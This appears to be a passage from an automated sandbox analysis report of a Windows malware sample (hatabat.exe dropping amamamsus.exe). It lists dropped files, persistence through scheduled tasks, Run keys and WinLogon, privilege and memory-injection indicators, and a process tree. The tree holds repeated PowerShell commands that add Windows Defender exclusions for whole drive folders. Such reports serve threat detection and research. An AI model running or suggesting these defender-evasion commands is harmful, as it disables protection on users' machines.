File created	C:\Program Files (x86)\Windows Mail\886983d96e3d3e	amamamsus.exe
File created	C:\Program Files\Windows Sidebar\088424020bedd6	amamamsus.exe
File created	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\ebf1f9fa8afd6d	amamamsus.exe
File created	C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe	amamamsus.exe
File created	C:\Program Files (x86)\Windows Mail\powershell.exe	amamamsus.exe
File created	C:\Program Files\7-Zip\setup.exe	amamamsus.exe
File opened for modification	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\taskhostw.exe	amamamsus.exe
File opened for modification	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\ea9f0e6c9e2dcd	amamamsus.exe
File created	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\cmd.exe	amamamsus.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\Idle.exe	amamamsus.exe
File created	C:\Program Files\7-Zip\826420e65ec10f	amamamsus.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\taskhostw.exe	amamamsus.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\6ccacd8608530f	amamamsus.exe

Drops file in Windows directory 28 IoCs

description	ioc	Process
File created	C:\Windows\bcastdvr\cmd.exe	amamamsus.exe
File created	C:\Windows\bcastdvr\ebf1f9fa8afd6d	amamamsus.exe
File opened for modification	C:\Windows\de-DE\fontdrvhost.exe	amamamsus.exe
File created	C:\Windows\DiagTrack\smss.exe	amamamsus.exe
File opened for modification	C:\Windows\DiagTrack\smss.exe	amamamsus.exe
File opened for modification	C:\Windows\Microsoft.NET\authman\upfc.exe	amamamsus.exe
File created	C:\Windows\CbsTemp\cc11b995f2a76d	amamamsus.exe
File created	C:\Windows\AppReadiness\7a0fd90576e088	amamamsus.exe
File created	C:\Windows\DiagTrack\69ddcba757bf72	amamamsus.exe
File created	C:\Windows\CbsTemp\winlogon.exe	amamamsus.exe
File created	C:\Windows\PrintDialog\en-US\fontdrvhost.exe	amamamsus.exe
File opened for modification	C:\Windows\bcastdvr\cmd.exe	amamamsus.exe
File opened for modification	C:\Windows\de-DE\5b884080fd4f94	amamamsus.exe
File opened for modification	C:\Windows\DiagTrack\69ddcba757bf72	amamamsus.exe
File created	C:\Windows\AppReadiness\explorer.exe	amamamsus.exe
File created	C:\Windows\Microsoft.NET\authman\upfc.exe	amamamsus.exe
File created	C:\Windows\PrintDialog\en-US\fontdrvhost.exe	amamamsus.exe
File created	C:\Windows\en-US\conhost.exe	amamamsus.exe
File created	C:\Windows\en-US\088424020bedd6	amamamsus.exe
File created	C:\Windows\Microsoft.NET\authman\ea1d8f6d871115	amamamsus.exe
File opened for modification	C:\Windows\bcastdvr\ebf1f9fa8afd6d	amamamsus.exe
File opened for modification	C:\Windows\AppReadiness\explorer.exe	amamamsus.exe
File created	C:\Windows\de-DE\5b884080fd4f94	amamamsus.exe
File created	C:\Windows\Branding\shellbrd\69ddcba757bf72	amamamsus.exe
File opened for modification	C:\Windows\AppReadiness\7a0fd90576e088	amamamsus.exe
File opened for modification	C:\Windows\Microsoft.NET\authman\ea1d8f6d871115	amamamsus.exe
File created	C:\Windows\Branding\shellbrd\smss.exe	amamamsus.exe
File created	C:\Windows\de-DE\fontdrvhost.exe	amamamsus.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
6452	WMIC.exe

Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery

T1057

pid	Process
5092	tasklist.exe
2208	tasklist.exe
4624	tasklist.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2388	systeminfo.exe

Modifies registry class 16 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	dllhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	amamamsus.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	hatabat.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
6620	schtasks.exe
6852	schtasks.exe
6332	schtasks.exe
968	schtasks.exe
2248	schtasks.exe
6868	schtasks.exe
1176	schtasks.exe
1368	schtasks.exe
4412	schtasks.exe
1476	schtasks.exe
4092	schtasks.exe
2028	schtasks.exe
4492	schtasks.exe
2312	schtasks.exe
3036	schtasks.exe
812	schtasks.exe
4380	schtasks.exe
4904	schtasks.exe
3620	schtasks.exe
4644	schtasks.exe
4492	schtasks.exe
1388	schtasks.exe
6928	schtasks.exe
7024	schtasks.exe
2908	schtasks.exe
1156	schtasks.exe
6312	schtasks.exe
2708	schtasks.exe
5088	schtasks.exe
1132	schtasks.exe
4172	schtasks.exe
7000	schtasks.exe
3656	schtasks.exe
3020	schtasks.exe
2012	schtasks.exe
4352	schtasks.exe
4336	schtasks.exe
6496	schtasks.exe
6820	schtasks.exe
1040	schtasks.exe
3636	schtasks.exe
6888	schtasks.exe
912	schtasks.exe
6412	schtasks.exe
6912	schtasks.exe
3192	schtasks.exe
4420	schtasks.exe
2476	schtasks.exe
3180	schtasks.exe
4464	schtasks.exe
3112	schtasks.exe
4420	schtasks.exe
3184	schtasks.exe
4888	schtasks.exe
4180	schtasks.exe
6536	schtasks.exe
6332	schtasks.exe
1576	schtasks.exe
2064	schtasks.exe
6804	schtasks.exe
4816	schtasks.exe
4728	schtasks.exe
6980	schtasks.exe
740	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2356	powershell.exe
5008	powershell.exe
5008	powershell.exe
5008	powershell.exe
2356	powershell.exe
2356	powershell.exe
968	powershell.exe
968	powershell.exe
1148	powershell.exe
1148	powershell.exe
968	powershell.exe
1148	powershell.exe
1576	powershell.exe
1576	powershell.exe
1576	powershell.exe
1720	powershell.exe
1720	powershell.exe
1720	powershell.exe
1676	powershell.exe
1676	powershell.exe
1676	powershell.exe
1140	powershell.exe
1140	powershell.exe
1140	powershell.exe
1628	powershell.exe
1628	powershell.exe
1628	powershell.exe
2336	amamamsus.exe
1220	amamamsus.exe
1816	scvhost.exe
1220	amamamsus.exe
1220	amamamsus.exe
1220	amamamsus.exe
1220	amamamsus.exe
2336	amamamsus.exe
2336	amamamsus.exe
2336	amamamsus.exe
2336	amamamsus.exe
2336	amamamsus.exe
2336	amamamsus.exe
2336	amamamsus.exe
1220	amamamsus.exe
1220	amamamsus.exe
2416	powershell.exe
2416	powershell.exe
2576	powershell.exe
2576	powershell.exe
1532	powershell.exe
1532	powershell.exe
896	powershell.exe
896	powershell.exe
2372	powershell.exe
2372	powershell.exe
1104	powershell.exe
1104	powershell.exe
664	powershell.exe
664	powershell.exe
4560	powershell.exe
4560	powershell.exe
3676	powershell.exe
3676	powershell.exe
4884	powershell.exe
4884	powershell.exe
2644	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1816	scvhost.exe
Token: SeShutdownPrivilege	2928	WScript.exe
Token: SeCreatePagefilePrivilege	2928	WScript.exe
Token: SeDebugPrivilege	2356	powershell.exe
Token: SeDebugPrivilege	5092	tasklist.exe
Token: SeDebugPrivilege	2208	tasklist.exe
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeIncreaseQuotaPrivilege	4900	WMIC.exe
Token: SeSecurityPrivilege	4900	WMIC.exe
Token: SeTakeOwnershipPrivilege	4900	WMIC.exe
Token: SeLoadDriverPrivilege	4900	WMIC.exe
Token: SeSystemProfilePrivilege	4900	WMIC.exe
Token: SeSystemtimePrivilege	4900	WMIC.exe
Token: SeProfSingleProcessPrivilege	4900	WMIC.exe
Token: SeIncBasePriorityPrivilege	4900	WMIC.exe
Token: SeCreatePagefilePrivilege	4900	WMIC.exe
Token: SeBackupPrivilege	4900	WMIC.exe
Token: SeRestorePrivilege	4900	WMIC.exe
Token: SeShutdownPrivilege	4900	WMIC.exe
Token: SeDebugPrivilege	4900	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4900	WMIC.exe
Token: SeRemoteShutdownPrivilege	4900	WMIC.exe
Token: SeUndockPrivilege	4900	WMIC.exe
Token: SeManageVolumePrivilege	4900	WMIC.exe
Token: 33	4900	WMIC.exe
Token: 34	4900	WMIC.exe
Token: 35	4900	WMIC.exe
Token: 36	4900	WMIC.exe
Token: SeDebugPrivilege	4624	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4900	WMIC.exe
Token: SeSecurityPrivilege	4900	WMIC.exe
Token: SeTakeOwnershipPrivilege	4900	WMIC.exe
Token: SeLoadDriverPrivilege	4900	WMIC.exe
Token: SeSystemProfilePrivilege	4900	WMIC.exe
Token: SeSystemtimePrivilege	4900	WMIC.exe
Token: SeProfSingleProcessPrivilege	4900	WMIC.exe
Token: SeIncBasePriorityPrivilege	4900	WMIC.exe
Token: SeCreatePagefilePrivilege	4900	WMIC.exe
Token: SeBackupPrivilege	4900	WMIC.exe
Token: SeRestorePrivilege	4900	WMIC.exe
Token: SeShutdownPrivilege	4900	WMIC.exe
Token: SeDebugPrivilege	4900	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4900	WMIC.exe
Token: SeRemoteShutdownPrivilege	4900	WMIC.exe
Token: SeUndockPrivilege	4900	WMIC.exe
Token: SeManageVolumePrivilege	4900	WMIC.exe
Token: 33	4900	WMIC.exe
Token: 34	4900	WMIC.exe
Token: 35	4900	WMIC.exe
Token: 36	4900	WMIC.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeDebugPrivilege	1148	powershell.exe
Token: SeDebugPrivilege	1576	powershell.exe
Token: SeDebugPrivilege	1720	powershell.exe
Token: SeDebugPrivilege	1676	powershell.exe
Token: SeDebugPrivilege	1140	powershell.exe
Token: SeDebugPrivilege	1628	powershell.exe
Token: SeDebugPrivilege	2336	amamamsus.exe
Token: SeDebugPrivilege	1220	amamamsus.exe
Token: SeDebugPrivilege	1816	scvhost.exe
Token: SeIncreaseQuotaPrivilege	4628	WMIC.exe
Token: SeSecurityPrivilege	4628	WMIC.exe
Token: SeTakeOwnershipPrivilege	4628	WMIC.exe
Token: SeLoadDriverPrivilege	4628	WMIC.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1816	scvhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2264 wrote to memory of 2680	2264	hatabat.exe	135
PID 2264 wrote to memory of 2680	2264	hatabat.exe	135
PID 2264 wrote to memory of 2680	2264	hatabat.exe	135
PID 2264 wrote to memory of 4264	2264	hatabat.exe	254
PID 2264 wrote to memory of 4264	2264	hatabat.exe	254
PID 2264 wrote to memory of 3672	2264	hatabat.exe	182
PID 2264 wrote to memory of 3672	2264	hatabat.exe	182
PID 2264 wrote to memory of 3672	2264	hatabat.exe	182
PID 2264 wrote to memory of 1976	2264	hatabat.exe	85
PID 2264 wrote to memory of 1976	2264	hatabat.exe	85
PID 2264 wrote to memory of 1976	2264	hatabat.exe	85
PID 2264 wrote to memory of 4040	2264	hatabat.exe	152
PID 2264 wrote to memory of 4040	2264	hatabat.exe	152
PID 2264 wrote to memory of 1816	2264	hatabat.exe	88
PID 2264 wrote to memory of 1816	2264	hatabat.exe	88
PID 2264 wrote to memory of 4016	2264	hatabat.exe	89
PID 2264 wrote to memory of 4016	2264	hatabat.exe	89
PID 2264 wrote to memory of 3448	2264	hatabat.exe	90
PID 2264 wrote to memory of 3448	2264	hatabat.exe	90
PID 2264 wrote to memory of 2928	2264	hatabat.exe	92
PID 2264 wrote to memory of 2928	2264	hatabat.exe	92
PID 4016 wrote to memory of 4880	4016	setup.exe	93
PID 4016 wrote to memory of 4880	4016	setup.exe	93
PID 3672 wrote to memory of 4356	3672	dllhost.exe	94
PID 3672 wrote to memory of 4356	3672	dllhost.exe	94
PID 3672 wrote to memory of 4356	3672	dllhost.exe	94
PID 3672 wrote to memory of 3120	3672	dllhost.exe	95
PID 3672 wrote to memory of 3120	3672	dllhost.exe	95
PID 3672 wrote to memory of 3120	3672	dllhost.exe	95
PID 4880 wrote to memory of 3644	4880	setup.exe	269
PID 4880 wrote to memory of 3644	4880	setup.exe	269
PID 4880 wrote to memory of 1532	4880	setup.exe	259
PID 4880 wrote to memory of 1532	4880	setup.exe	259
PID 4880 wrote to memory of 4000	4880	setup.exe	100
PID 4880 wrote to memory of 4000	4880	setup.exe	100
PID 4880 wrote to memory of 1364	4880	setup.exe	101
PID 4880 wrote to memory of 1364	4880	setup.exe	101
PID 1532 wrote to memory of 5008	1532	cmd.exe	104
PID 1532 wrote to memory of 5008	1532	cmd.exe	104
PID 3644 wrote to memory of 2356	3644	cmd.exe	105
PID 3644 wrote to memory of 2356	3644	cmd.exe	105
PID 1364 wrote to memory of 5092	1364	cmd.exe	106
PID 1364 wrote to memory of 5092	1364	cmd.exe	106
PID 4000 wrote to memory of 2208	4000	cmd.exe	107
PID 4000 wrote to memory of 2208	4000	cmd.exe	107
PID 4880 wrote to memory of 5088	4880	setup.exe	217
PID 4880 wrote to memory of 5088	4880	setup.exe	217
PID 4880 wrote to memory of 552	4880	setup.exe	110
PID 4880 wrote to memory of 552	4880	setup.exe	110
PID 4880 wrote to memory of 1176	4880	setup.exe	178
PID 4880 wrote to memory of 1176	4880	setup.exe	178
PID 4880 wrote to memory of 2268	4880	setup.exe	114
PID 4880 wrote to memory of 2268	4880	setup.exe	114
PID 4880 wrote to memory of 3280	4880	setup.exe	115
PID 4880 wrote to memory of 3280	4880	setup.exe	115
PID 4880 wrote to memory of 244	4880	setup.exe	118
PID 4880 wrote to memory of 244	4880	setup.exe	118
PID 5088 wrote to memory of 4900	5088	cmd.exe	121
PID 5088 wrote to memory of 4900	5088	cmd.exe	121
PID 1816 wrote to memory of 1148	1816	scvhost.exe	233
PID 1816 wrote to memory of 1148	1816	scvhost.exe	233
PID 1176 wrote to memory of 4624	1176	cmd.exe	123
PID 1176 wrote to memory of 4624	1176	cmd.exe	123
PID 3280 wrote to memory of 1908	3280	cmd.exe	180

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\hatabat.exe
"C:\Users\Admin\AppData\Local\Temp\hatabat.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2264
- C:\Users\Admin\AppData\Roaming\adb.exe
  "C:\Users\Admin\AppData\Roaming\adb.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bat.bat" "
  2⤵
  PID:4264
- C:\Users\Admin\AppData\Roaming\dllhost.exe
  "C:\Users\Admin\AppData\Roaming\dllhost.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3672
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\1K70CMgSeGxLkKeGse1VkEk.vbe"
    3⤵
    - Checks computer location settings
    PID:4356
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\WQrCS9t0V.bat" "
      4⤵
      PID:1008
    - - C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\amamamsus.exe
        
        "C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\amamamsus.exe"
        5⤵
        Modifies WinLogon for persistence
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2336
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:896
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1628
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1532
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2576
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2372
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3676
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1600
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5052
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2312
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:664
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2644
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4108
      - C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\amamamsus.exe
        
        "C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\amamamsus.exe"
        6⤵
        Executes dropped EXE
        
        PID:2260
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\file.vbs"
    3⤵
    PID:3120
- C:\Users\Admin\AppData\Roaming\fastboot.exe
  "C:\Users\Admin\AppData\Roaming\fastboot.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1976
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\msg.vbe"
  2⤵
  - Checks computer location settings
  PID:4040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\WQrCS9t0V.bat" "
    3⤵
    PID:2680
  - - C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\amamamsus.exe
      "C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\amamamsus.exe"
      4⤵
      Modifies WinLogon for persistence
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Program Files directory
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1220
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3644
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2872
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1472
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1668
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4180
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2416
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4560
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2440
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1104
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4884
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:440
    - - C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\amamamsus.exe
        
        "C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\amamamsus.exe"
        5⤵
        Modifies WinLogon for persistence
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        
        PID:1964
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5004
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4928
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4372
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1544
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4064
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6388
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:956
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6376
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6392
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6428
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6432
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WMJSAKx7vo.bat"
        6⤵
        
        PID:6916
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:1048
        
        C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe
        
        "C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:5944
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\977123b5-51d8-4d92-b1f8-fe73100c98d9.vbs"
        8⤵
        
        PID:4836
        
        C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe
        
        "C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:1592
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fab5a9bb-2602-4031-97c2-168258bd0ece.vbs"
        10⤵
        
        PID:2544
        
        C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe
        
        "C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:6020
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dceb85e2-b686-41fe-8ebe-e7e52ec5cf8a.vbs"
        12⤵
        
        PID:6512
        
